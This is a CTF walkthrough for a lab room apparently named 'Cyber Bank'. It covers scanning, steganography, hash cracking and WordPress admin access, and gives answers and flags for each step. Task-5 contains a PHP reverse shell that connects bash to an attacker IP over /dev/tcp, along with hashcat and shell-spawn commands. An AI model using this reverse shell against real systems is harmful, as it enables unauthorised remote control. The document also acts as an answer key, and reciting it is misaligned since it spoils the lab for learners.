CTF Solving Machine – Assessment

Tasks with Walkthrough Solution:

Task -1 Deploy the Machine
You can directly connect with TryHackMe VPN connection to perform testing
with your KALI OS / PARROT OS
Or
You can use the ATTACK BOX on TryHackMe portal

Task-2 Information gathering and Scanning
After the machine ready
We check the Target IP address and note it.
Like in my case it was – 192.168.153.136
And the Attacker OS – 192.168.153.129

Questions -1
Which two port numbers are open on Target Machine?
Answer: 22,80

Questions-2
What is the txt file showing 10 disallow entries mention in the file?
Answer: robots.txt

Questions -3
What is the title of the Website you found in Aggressive Scan through NMAP?
Answer: CYBER BANK
Hint: #nmap -A -T5 -vvv 10.x.x.x

Questions -4
Can we collect any user information when we perform User Enumeration
technique on Target Machine? (Yay/Nah)
Answer: Nah

Task-3 Recon the Website
Here you have to perform recon techniques on the Website running on Port
80.
Questions -1
Can you tell which Agency has built the Website Theme?
Answer: Themeansar

Questions -2
Can you find the Flag-0, while exploring the website?
Answer: THM{N00B_E#D_FL@G-0}

Questions -3
Can you provide what Hash value you have found while getting the Admin
Password?
Answer:
7f18e6f5753603b031a471802dfdfb52a93d531c54a24c191f832e57cfe6784c
Hint: Check the CB logo and decode by the “Steg hide” tool to get the HASH

Questions -4
What is the Admin Password? Here Explore the About Us Page and decode the
Image to get the Admin Password?
Answer: I_will_n3v3r_F0rg3t
Hint: Do extract the s3c***.txt file and decode with using the password list file
given in Task File
Get the password list from here: https://github.com/mukesh420/cyber_bank

Save this Image and then extract the image using the Steghide tool, but here is
some twist is there, when we extract the image, we required the password.
So do read the instruction given left side content in the About Us section.

Here is how you can assure that the Image is not a real image, as when we use
the “exif” tool utility then we can see the Information about the EXIF data is
not present it shows the Data is corrupted.
Also, here when we check the “file” tool utility then it shows the save image is
an Image.
Now you need to try to extract with Steghide, but here it asks password, so
check the source code of the Page.

So, here we don’t get confuse with the Password is “PAssWord!”
Check the sentence is return in HTML comment, so original password is
“password” only.
Use this password and extract the Image.

Here we can see the information there is some information is hidden name
“s3cr3t.txt”
We can see by use the passphrase: password

Here we got the hidden data at last
Now we need to decode it, as it seems to be base64 code value
So, we use the “base64” tool utility to decode it and we found the hash value
“7f18e6f5753603b031a471802dfdfb52a93d531c54a24c191f832e57cfe6784c”

Now to decode we have and password file I given that we use with John tool to
extract the password

Here we have the password wordlist is provided download the file and use the
John tool to crack the SHA-256 hash is found.
Alternative, you can also try to work with Hashcat too also, if the John tool not
work properly
#hashcat -a 0 -m 1400 hash.txt pass.txt
Here we need to attached the File of password combination to crack the
admin password.

Here we working on next task so here we need to work on the new task to
fetch the FLAG 1
Task-4 Manual Exploration – Try Hard
Here we need to explore the ABOUT US now we have to proceed for Blog Post
pages, and search the new FLAG-1
Question-1
Can you find the Flag, while exploring the website? {FLAG-1}
Answer: THM{P@GE_C0NT3NT_FL@G-1}
Here we found the flag in blog post, Working Together to Make Investments
successful.

Question-2
Can you find the Admin Email ID?
Answer: [email protected]

Questions -3
Can you find the Flag, while exploring the website? {FLAG-2}
Answer: THM{GR@B_ADM!M_FL@G-2}

Here we got some hint about the admin user information, check the user’s
name for each blog written on the site.
Now here we get the information that the Website is build on WordPress CMS
platform, so we need to found the admin login page so, the default is /wp-
admin/ is there, but when we try it redirect to main page due to Firewall is
blocking it. Also, but in hint is given we have to found login name-based file.
So, here we can use some Directory listing tool to get the information, but it
already stats that we need to think as Manual approach instead of going
directly to automate tool. So, here we need to take word, login and check with
different webpage extension support page.
So, we got the information at “/wp-admin/login.php” location. Again, here
check the Source Code of the Page.

Question-4
Can you find the Flag, while exploring the website URL directories? {FLAG-3}
Answer: THM{L0GIN_F0UND_FL@G-3}

After explore you will get the “/?author=” link whenever you see other author
information from the blog page.

Here you can check the URL, the author information is showing when you
change the number, so found the original Admin Username from this
exploration.

Same when we do little research we got the login page of WordPress at
“/?login”.
Question-5
Find the Admin Username?
Answer: D0n_tCry

Task-5 Get the Root Access
Now here we found the username and password for the WordPress Admin
panel, also we
Questions-1
Did you upload the reverse shell in Admin Panel? (Yay/Nay)
Answer: Yay
Now little crucial part come here, we need to login and get reverse shell of the
machine
Here we can use various Shells available, one famous you can use the Pentest
Monkey Reverse Shell.

Here, I use this Netcat Reverses shell to upload the reverse shell
<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.128/8080 0>&1'")

?>

Here you can relace the IP address to your Attacker Machine IP or your Kali IP
address to get the reverse shell connections.

Now here when you upload the Shell it, in plugin section, it show some error
that the file is not uploaded or any other issue coming. So, don’t worry about
that and check the file is already uploaded in the Media Section.

Here you can see the Error Which I got while uploading process.

Here we see the file is already uploaded even the error is coming.

Now click on the file and you can see the URL that we need to execute to get
the reverse connection.

Now here you can copy the File URL Link and then open in new browser tab, to
run it.
But before running you should start the NC listener into your Attacker or Kali
machine.

Now we will run the file link on URL, and boom we got the reverse session of
the machine

Now let dig for Root Flag.

After login got, now I explore other directories and we found the /run directory
where have one secret hash and password list available.

Question-2
Where you found the password list, tell the directory name?
Answer: /run

Now we copy both the file data into kali or attacker machine and then perform
the Hash cracking part to get the Password.

8420aee0fa9cea0326c166bd9f903eeab3fdfa5b

So, when I visit to /home directory we got the user’s name is “ineuron” is
available and checking the /etc/passwd file info it showing that ineuron user
have admin rights.
Questions-3
Which user password you have cracked?
Answer: ineuron

Question-4

Did you reach near Root user access? (Yay/Nay)
Answer: Yay

Here we found the next Answer too.

Here we login with Ineuron user and its password we have crack it.
Now we use python code to invoke the interactive shell so root folder we can
view properly

#python3 -c ‘import os; os.system(“/bin/sh”)’

Then here we found the hIdd3n folder with one secret key
That’s out flag and its in ROT13 algorithm is used to encryption so we need to
decrypt it as show in the below image. Tada, we have Got the Last Flag also.
Question-5
What algorithm the Flag is Encrypted?
Answer: ROT13

Here we got the flag:

Questions-6
Provide the Final Root Flag? {FLAG-4}
Answer: THM{G3T_R00T_@CC3$$_FL@G-4}
Thanks for the be patient! I hope you like the Room challenges. Thank you
Once Again to solving with me!